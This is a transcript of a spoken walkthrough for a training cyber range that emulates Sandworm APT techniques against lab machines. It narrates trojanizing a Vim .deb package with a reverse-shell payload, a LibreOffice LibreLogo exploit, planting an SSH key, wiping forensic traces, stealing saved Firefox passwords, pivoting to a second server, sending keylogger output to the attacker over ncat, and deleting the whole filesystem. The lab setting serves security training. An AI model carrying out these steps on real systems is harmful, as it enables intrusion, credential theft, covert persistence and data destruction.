Hello, and welcome to the walkthrough for the Sandworm APT range. In this lab, we'll take a look at a few of the techniques and tactics that the Sandworm APT group has used and replicate them. To get started, we'll want to go ahead and click on either Start Range or Reset Range. I've been working in this VM already, so I'm going to click Reset Range, but Start Range should work for you. If for whatever reason the cyber range doesn't come up, or you experience issues, you can always feel free to go ahead and click on Reset Range. Just note that this will lose any progress that is in the range already. So we'll click Run there, and we should, in just a moment, have two VNC windows open up. One for a Kali machine, or Kali Linux that is, and one for the victim machine. Perfect. Here we can see a student VM that's running Kali Linux, and in the background we have our victim machine. If during this lab you accidentally happen to exit out of one of these, not to worry, you don't need to reset the entire range. You can just go ahead and click on the Connect to and then the respective machine here. So I accidentally X'd out of the victim machine here, so we'll go ahead and click this and run it, and we can see we have it once again. Just while we're getting started, let's go ahead and minimize this so we can focus on the student machine. In the first section of this lab, we'll mimic a Sandworm technique of poisoning a software supply chain. In the specific example, we'll Trojanize a .deb file, specifically Vim in this example. To get started, let's open up a terminal and take a look at the .deb file that we have already. This will be in the /root directory. Here we can see the .deb. In order to Trojanize this, we'll extract it, add a few scripts to it, and then compress it once again so that it can be installed on our victim server. To get started, we'll go ahead and navigate to the temp directory and make a directory that we'll call work. You can call it whatever you want. I'm just going to call it work so we have all of our work for this step in one space. So let's go into this directory that we've just created, and we'll copy over our .deb file and go ahead and extract it with dpackage-x and then the Cool. We can see a user directory, and if we went into this, we'd be able to see all of the files that Vim installs when it's installed. The next thing that we're going to do is create a Debian directory. This will allow us to add a few files that will specify what happens when the application is installed and after it's been installed. So go ahead and create this directory, all caps Debian, go ahead and enter that directory, and now we'll need to create a control file. So go ahead and use your favorite editor. In this example, I'll use Nano, but feel free to use Vim or Emacs or whatever you're most comfortable with. In this file, you want to copy the contents that are listed in the exam guide. Make sure that you don't accidentally grab the top line here. The top line should say package Vim. If this were an actual attack, we would probably make this a little bit more convincing by editing the description to be whatever Vim standard description is. Once you have this set up like this, go ahead and save the file. And next we'll need to create a post-inst or post-install file. This includes the instructions of what should execute after the application has been installed. In this example script here, we are making a specific file executable, and that is the user share vim add-ons update file, and then we are immediately running that file. This update file is going to be our malicious application. This update file will send a reverse shell back to us so that even though we'll be on this Kali machine, we'll be able to execute commands on the victim server. Once you have this set up like this, go ahead and save the file. And the next thing that we'll need to do is, before we work on creating that update file, go ahead and make the post install file executable. Perfect. We can see that there is a X here, meaning that it is in fact executable. Now that we have those two files in place, we can go ahead and generate our payload. Since our post file will be running something in the add-ons directory called update, we'll need to make sure that that directory actually exists. Go ahead and run make-dir-p with the full directory here: temp, work, user, share, vim, add-ons. Next, we'll use a program called MSF Venom to generate a payload for us. If you're following along with the course notes, this is a command that you'll see. This is telling MSF Venom to create a payload with a 64-bit architecture for a Linux platform using the Linux x64 shell reverse TCP payload to avoid any null characters, to do an output format of ELF, and to output to our update file. One important thing to change here is to ensure that you change the attacker IP to whatever your IP is. If you don't know what this is, you can grab it by running the IPA command. Here we can see that our IP is 172.20.0.2, so I'll enter that in. And we'll give that a run. And in just a moment it should finish up and have generated. Perfect. So we can see that it's generated, it encoded it with an encoder to avoid the null character, and saved it into our update file. With that, we have our malicious app all Trojanized and ready to go. All we need to do is build it back up. So let's cd to the temp directory, and we'll run dpackage -deb with a build argument with the temp work. Here we can see that it built the package vim into temp work.deb. Let's move to our home directory with a cd, and we'll make a distribution directory here. Move into that, and we'll move that .deb that we just created, the work.deb, to this directory, and we'll call it vim.deb. You can call it anything you'd like, but since we're pretending to have a vim file, might as well be vim.deb. Now that we have this here, we'll need to distribute it to our victim server somehow. The way that I'll do this is by using the built-in HTTP server in Python 3. So go ahead in this window and run python-m http.server and then 80. Make sure that when you run Python, it's Python 3 and not just Python. If you are running in Python or Python 2, you'll need to change this HTTP server to simple HTTP server instead. But no need to worry about that if you just use Python 3 like this. So we'll give that a run, and it'll serve this directory, this distribution directory that we created, on port 80, since we specified port 80. We'll open up a new terminal, and create a netcat listener so that we can catch that reverse shell once our victim installs the malicious.dev file. Since a port of 443 was specified when we ran MSF Venom, we'll run our listener on this same port as well. Cool. All that's left now is to trick our victim into running this. We can assume that some sort of phishing campaign has been run, or maybe the victim is your friend and you've told them that there's this really cool update to Vim that they need to download. Either way, by some way, the victim has been convinced to download our application and install it. So I'm going to go ahead and run a wget command to copy this over. I've already forgotten the IP, so let's take a look. 20.0.2. So 20.0.2. And the file was named vim.deb. So we'll go ahead and grab that. Fantastic, it's downloaded. And now we can go ahead and install this. So we'll do sudo dpackage-i vim.deb. Here we can see that the installation has hung, which is a good sign for us. If we go ahead and look at our Kali machine once again, we can see that we received a connection from our victim machine. And even though there's no prompt or anything, if we run a command, we can see that we have code execution on this server. Fantastic. As soon as we exit this reverse shell, say by typing in a Control-C, we can see that the installation finished here. The next thing that we'll look at in this lab is a different way of achieving code execution on a victim server. So we'll take a look at how we can generate and execute code via a file format issue. In this specific lab, we'll take a look at an issue with an early version of LibreOffice and how this version allowed for code execution just by opening an application. To get started, we'll need to create this malicious file. We can do this in the easiest way by opening up MSF console for the Metasploit framework. And once this opens up, we'll be able to generate a file using a pre-baked exploit. So go ahead and search Libre logo, which is the name of the exploit, or rather than the name of the exploited app that's used. We can see this comes up right away, so use 0 to identify that we're going to use the number 0 exploit here. And we'll grab some more information about it with the info command. We can see that LibreOffice comes with some macros written in Python, and this exploit will take advantage of that to allow us to execute arbitrary code. So as always, what we'll need to do is set our file host to our current IP so that we can return any reverse shell to our IP. This should be 172.20.0.2. I am going to double check that to make sure. 172.20.0.2, perfect. Just in case that was a little too fast. If you ever don't know your IP address, or at least your local IP address, you can do a IP space A command. And this will print out information about each of your interfaces and the appropriate IP. I know it's not this one because this is the loopback address, and this just refers to localhost. This is our actual IP. Anyways, so we'll need to set that. We'll also need to set a port for the reverse shell to connect back on. We can go ahead and use any port you'd like for this. 443 is a good port to use in general because 443 is usually allowed by firewalls as it's needed for HTTPS traffic. Though if you want to use some other number, feel free to go ahead and do it. Now that we have both of those set, we can go ahead and run our exploit. So after typing run, we see that the file was generated and it was stored at this location. Fantastic. Now that we've created this, we'll need to create a handler so that when the reverse shell comes back, we can actually catch it and then interact with that shell. So go ahead and type in use multi/handler. And we'll need to set the payload to the specific payload that's used in this Libri logo exploit. This is a Python payload, which isn't the standard one that it will use. You can see here that using configured payload, generic, shell reverse TCP. If you just use the handler with this generic payload, it's not going to work. Here we can see that when we typed in use0 for the Libri logo exploit, it let us know that it was using the Python interpreter reverse TCP payload. So we're going to go ahead and copy that and type set payload to that. Perfect. Then, just as before, we'll set lhost and lport to the correct values. There we go. And lport to 443, just as we did before. We can go ahead and run this, and this handler will sit here patiently, waiting for a reverse shell to go ahead and return to us. Just as before, we'll use a Python HTTP server to distribute our malicious file to the victim server. So go ahead and cd to the directory that was mentioned before, that was root/.msf4/local. And we can see our librifile.odt file here. And just like before, python 3-m http server http.server and an 80. And just as before, go ahead to your victim server and we'll wget it over. So wget our IP address for the victim and the name of the file. So librifile.odt. And here we can see that the file was downloaded. Next, we'll actually launch LibreOffice and launch this file, and we'll see what happens. One thing that we'll need to do for this specific machine is we'll need to do an export home equals temp, and then run LibreOffice after that. This wouldn't normally be the case, but for this specific machine, because of how it's set up in the VM, this is the case. But if this were a real-life pen testing engagement, or we were actually Sandworm, we wouldn't expect a user to have to do this. Anyways, we can go ahead and run this, and LibreOffice loads up, and we see a report and this lovely little turtle here. Cool. From the victim's or user's end, everything seems to be working fine. We can see the report, LibreOffice loaded, nothing weird happened. Let's go ahead and look at our student machine. And if we go ahead and look at our Metasploit console, we can see that the reverse shell was received, the stage was sent, and we have our interpreter session open. Fantastic. Now we have a shell open as, I believe, the admin user, and could begin to take a look at different privilege escalation methods and different ways of continuing this exploit. One thing that we'll do while we're here is we'll drop into a shell with interpreter, and we'll copy over a SSH key so that rather than having to use this interpreter shell, we can just directly SSH to the victim. First thing to do will be to generate some SSH keys. So to do this, we'll run SSH keygen. We can accept all of the defaults, no passphrase, and now we'll print out our SSH public key. So go ahead to your home directory with a .sh and cat out your id rsa.pub file. This will look a little bit different for you just because you've generated different keys. That's no worries at all. Go ahead and copy this. There we go. And go back to your Metasploit window. Now we'll need to create an authorized keys file so that we can drop our public key into that file. We can see there's no .ssh directory here, but that's not an issue. We can just create it. So make dir.ssh, and then go ahead and ssh into that directory. Cool. And then all we'll need to do is echo our public key. So I've done echo a quote, pasted the public key, another quote, and then I'll do a space, a angled bracket in order to redirect the output from this echo command, and I'll put it in our authorized keys file. What this means is that when we attempt to SSH into this victim machine, the SSH server that's on that machine will say, hey, what's your public key? We'll respond with our public key, and then it'll check into this keys file to see if anything matches. If something does match, it won't require us to have the password of that user. So, as long as I've done everything correctly here, this should allow us to SSH to our victim's machine without ever knowing their password. Let's give it a shot. We'll do SSH. We'll need to know the username of our victim, so we can run the ID command. We see that their username is admin, so SSH admin at, and we can go ahead and type in the IP address of our victim server. If you don't know this IP address or don't recall it, you can run pip a in the interpreter window, just like we did locally, so that we could check what the IP address is. But I know it's 172.20.0.4, so we can go ahead and run this. Accept the fingerprint, and we can see that we SSH'd into this victim machine without knowing their password. Once we've gained our initial access and have some level of persistence, it's good for us to delete any markers of exploitation, such that we can prevent being discovered while we still need to be doing things on the server. Since we can log in with SSH, let's go ahead and remove the malicious LibreOffice files and the Vim update file. We can go ahead and do this with SRM, which is a secure version of RM. It'll overwrite the file on the disk before unlinking the file, making it much harder to recover this file if any forensics or file recovery were meant to happen. So we can go ahead and run this on our user share vim add-ons update file, and we can also go ahead and run this on the Libre file. So we've deleted these, but Bash also keeps a history of all the commands we've run. When we log out, this history will be written to the .bash_history file. We can see that there's one here, and if we wanted to snoop on what was happening before we came here, we can see this. So what we'll want to do here is remove this so that any activity that we've done won't be seen. There we go. And we'll also want to ensure that anything that we do won't get written out to disk when we log out. So we can export hist file size equals 0 here. Fantastic. Now, once we log out, the commands that we've written here shouldn't get logged to disk. Let's go ahead and test this out just to make sure it's working right. We can go ahead and run exit, And we'll SSH back in. And we can take a look and see our bash history file has still remained at a size of 0, meaning that the commands that we run weren't logged. One pretty common feature for our Sandworm to bundle into its malware is the ability to steal passwords from browsers. In this section, we're going to take a quick look at an open source tool, Firefox Decrypt, to steal some passwords from the machine that we've already compromised, the victim-1 server. The first thing that we'll need to do is actually transfer this tool over. We're going to transfer it over using a different method than we used before. Rather than using the wget method, we'll use something that will actually encrypt the file on transfer to make it a little bit more stealthy. On the attacker machine, we're going to set up a ncat listener. So we can go ahead and exit out of any Python HTTP servers that are running, and we won't need the interpreter anymore, so we can go ahead and exit out of that as well. Of course, if you'd like to keep it running, feel free to. So here I have ncat with the SSL flag set, setting up a ncat listener for port 443, and redirecting the contents of the Firefox decrypt.py file into that listener. I'm going to make sure that I'm in the right directory because I'm pretty sure I'm not, and I'm not. So go to your home directory with a CD and navigate to the tools directory. Here you can see the Firefox decrypt.py file, so we'll go ahead and run this here. It certainly looks like I've typed something incorrectly, so let's take a quick look at that. And let's try it with just a // and sure enough, it looks like the file is spelled incorrectly here. So I'll correct that. And there we go. Perfect. So now we have a listener here. As soon as a ncat session connects to this listener, that ncat session will download the file. So let's go ahead and do that and see how it works. On our victim machine, we'll run ncat --ssl -nv, n for no hostname resolution, and v for verbose, so we can get a better sense of what's happening. We'll type in our attacker IP, the port that the listener is running on, and redirect any output from this into Firefox_decrypt.py. Now there won't be any sort of loading bar or indication of its finished download, so give it a few seconds to run just to be sure, and then we can go ahead and Control-C out of this. If we take a look, we can see our Firefox decrypt file. So let's go ahead and run this. We'll run Python 3 and Firefox decrypt. We can see here that it's prompting for a primary password for the Firefox profile that it's found. Most people won't set a primary password for their Firefox account. Very few people know that this is a feature that's even there. So when you're prompted here, go ahead and just hit enter to leave the password blank. Perfect. We can see that Firefox Decrypt has found and printed out several username password combinations that it's found in this machine, that is the victim machine's Firefox cache, or not cache, but in the saved passwords. So using these passwords, we can then pivot to a second machine. So there's also a server running at 172.20.0.3. Using these passwords, we can try to see if we can jump to that server as well. So we'll SSH it looks like all of these have a admin prefix, so we'll try the admin username. And this SSH server is also running on port 2222. Go ahead and accept that fingerprint, and we'll just try these passwords. Try the first one, and what do you know? The first one works. Perfect. Here we can see we have code execution on yet another server. One of the last things that we'll do for this lab is to install a keylogger on the victim server. This is something that Sandworm has been known to do in the past, just wrapping a keylogger into whatever malware that they've generated. So we're going to install a keylogger, a very simple keylogger written in Python. In fact, the keylogger that we'll be installing is only around 20 lines long. If you're curious, you can take a look at the keylogger.py file, but it's definitely not needed for the completion of this course. But if you're curious about what's going on, feel free to take a look and see what's happening. Anyways, what we'll do is just give this a test on our Kali machine, see how it works, and then we'll transfer it over to our victim server and actually get it running there. So first thing that we'll want to do is we'll run python 3 keylogger.py. You can see that we get a blank node here. So let's open up a new tab, and we'll just type whatever into this tab. So this is a test of the keylogger. If we were typing in say admin@admin.com, and then we were typing in our very secure password. Cool. So let's see what output we got from the keylogger after we've done this. Awesome. We can see the raw keystrokes that we put in. So we see the shift key, we see all of the typos. So here we can see that I misspelled the word this, did 2 backspaces, another backspace, and then did IS to correct the SI transposition in that typo. So this is pretty cool. We can see all of the keystrokes that were entered in. And in fact, this isn't just limited to this terminal window. If I go ahead and open up this and I want to, I don't know, let's see, I want to open up transmission. So I enter in transmission. I see. I opened it up on the host machine. Let's do it on the actual machine where we're capturing things. So say I wanted to open up a file manager. I type in file manager. We can see that that also got captured. And if we continue to do this, just for fun, we can see all of the content, even if it's not in that window. So go ahead and exit out of this with a Control-C. You might have to type Control-C a few times just because Python doesn't always listen to the first signal it receives. So we verified how this works. Now let's set it up so that we can run it on our victim server. Just like before, we'll use a ncat connection between the two machines to transfer the keylogger over. So go ahead and type ncat space --SSL nvlp 443 and redirect the keylogger file into that. Then on the victim server, we'll do the same thing but for the other side. So ncat --SSL nc our attacker IP, the port, so 443, and then what we want to call it. So we'll call it, say, keys.py. Let's see, what have I missed here? You must specify a host to connect to ncat --SSL Not NC, NV. Perfect. So, as before, give that a moment to transfer. It's probably finished up already because it's a very small file, so we'll Control-C out of that and take a look. Looks great. So, as we saw before, this keylogger.py will by default print out to the terminal. That's really cool, but it's not very useful to us if we're trying to read whatever this victim says or types in their windows. Like, if it's just printing out to this SSH connection, that's not that great. It's not that useful for us. So what we'll do instead is we'll redirect or pipe this output back into an NCAT connection so that the output is 1, encrypted, and 2, being sent back to our attacker. Let's take a look at that. So what we'll do is on the attacker, on the attacker machine, we'll type ncat-ssl and VLP 443 and redirect this to some log file. So let's say keys_log.txt. And VLP, not NELP. Perfect. And on the victim, we'll explicitly tell it which display we want this keylogger to attach to. So export display equals :1.0 and Python 3 keys.py, and then we will pipe the output of that to ncat-ssl-nv, our attacker IP, and 443. Cool, so that's running. Now that that's running, let's switch over to the victim server and see how this goes. So I'm just going to close this, and let's open up a terminal here, and we'll run a few commands. So run this, we'll do SSH keygen, and let's say we're creating this key and we need to encrypt it. So we're going to do a super secure password. I'm going to need to do this again because I did just kind of key smash there. So cool. So we have a super secure password that even I'm not really sure what I just typed. Let's go and take a look at our output now. So here we still have this running, so let's open this up and run tailf key log.txt. So here we can see that this person has typed in ls-a, they've done SSH keygen, and here is their password. Awesome. And just as before, even though I did this in the terminal, this will actually capture anything that we do. So if we open up this Libri file again, let's see. Am I going to be able to type in this? No, it's open read only. Alright, let's close that. So if I type into this, it should be able to capture it anyways. And let's see if we got that. Cool. Here we can see my horrible spelling of desktop and see that all of that was still captured. So at this point, we've exploited the victim machine in a few ways. We exploited it via trojanized.deb file. We did a LibreOffice client-side exploit. We installed a keylogger. We've decrypted browser passwords. We've even jumped to a second server. Now, most of Sandworm's attacks are fairly destructive. So once we've taken the data that we want, let's go ahead and destroy our victim server. In our SSH connection to the victim, go ahead and cancel out of any open connections. And, well, let's go ahead and destroy the server. So we can do a sudo srm-rf and /. This will securely remove, that is, remove and overwrite to help prevent any sort of file recovery or forensics, recursively and force from the root, so deleting every single file and server that's on this machine. Go ahead and run it. We can see that it'll give us a few seconds, just in case we've accidentally run this on a machine that we care about, before swiftly removing everything. Now, this will take some time to run, so feel free to exit early. Otherwise, you can go ahead and wait for this to finish up, or Control-C it earlier. I personally always wanted to do this on my own Linux machine, but never did because I didn't want to horribly mess something up. So it was a fun thing for me to do, to let this run through until the very end, see what it does, and then see what it's like to use a Linux server where everything has been removed. So I'm going to go ahead and Control-C out of this. And we can see that a lot of our commands don't work anymore. We can't ls because ls has been removed. We can do some built-in commands like cd. So we can still cd because cd is a built-in shell command. But aside from that, there's not much that we'll be able to do. If any commands haven't been removed yet, so it looks like pwd hasn't been removed, we'll be able to do that. But yeah, that's pretty much it. Anyways, I hope you've enjoyed this. I hope you've enjoyed the walkthrough. And congrats on finishing this lab.